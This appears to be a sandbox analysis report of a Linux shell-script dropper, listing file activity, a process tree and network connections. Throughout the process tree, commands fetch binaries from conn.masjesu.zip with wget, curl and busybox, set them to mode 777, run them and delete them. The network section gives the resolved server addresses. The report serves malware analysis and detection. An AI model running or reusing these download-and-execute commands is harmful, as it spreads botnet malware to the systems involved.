File opened for modification /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /usr/bin/curl N/A
File opened for modification /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /usr/bin/curl N/A
File opened for modification /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /usr/bin/curl N/A
File opened for modification /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /usr/bin/curl N/A
File opened for modification /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /usr/bin/curl N/A
File opened for modification /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /usr/bin/curl N/A
File opened for modification /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /usr/bin/curl N/A
File opened for modification /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /usr/bin/curl N/A
File opened for modification /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /usr/bin/curl N/A
File opened for modification /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /usr/bin/curl N/A

Processes

/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh

[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/chmod

[chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1

[./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/rm

[rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/chmod

[chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs

[./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/rm

[rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/chmod

[chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8

[./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/rm

[rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/chmod

[chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s

[./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/rm

[rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/chmod

[chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T

[./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/rm

[rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/chmod

[chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z

[./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/rm

[rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/chmod

[chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF

[./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/rm

[rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/chmod

[chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j

[./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/rm

[rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/chmod

[chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV

[./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/rm

[rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/chmod

[chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH

[./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/rm

[rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/chmod

[chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj

[./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/rm

[rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/chmod

[chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU

[./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/rm

[rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/chmod

[chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr

[./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/rm

[rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/chmod

[chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya

[./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/rm

[rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/chmod

[chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV

[./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/rm

[rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/chmod

[chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH

[./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/rm

[rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/chmod

[chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj

[./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/rm

[rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/chmod

[chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU

[./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/rm

[rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/chmod

[chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr

[./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/rm

[rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/chmod

[chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya

[./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/rm

[rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/chmod

[chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8

[./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/rm

[rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/chmod

[chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s

[./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/rm

[rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/chmod

[chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T

[./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/rm

[rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/chmod

[chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1

[./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/rm

[rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/chmod

[chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs

[./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/rm

[rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/chmod

[chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z

[./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/rm

[rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/chmod

[chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF

[./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/rm

[rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/chmod

[chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j

[./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/rm

[rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
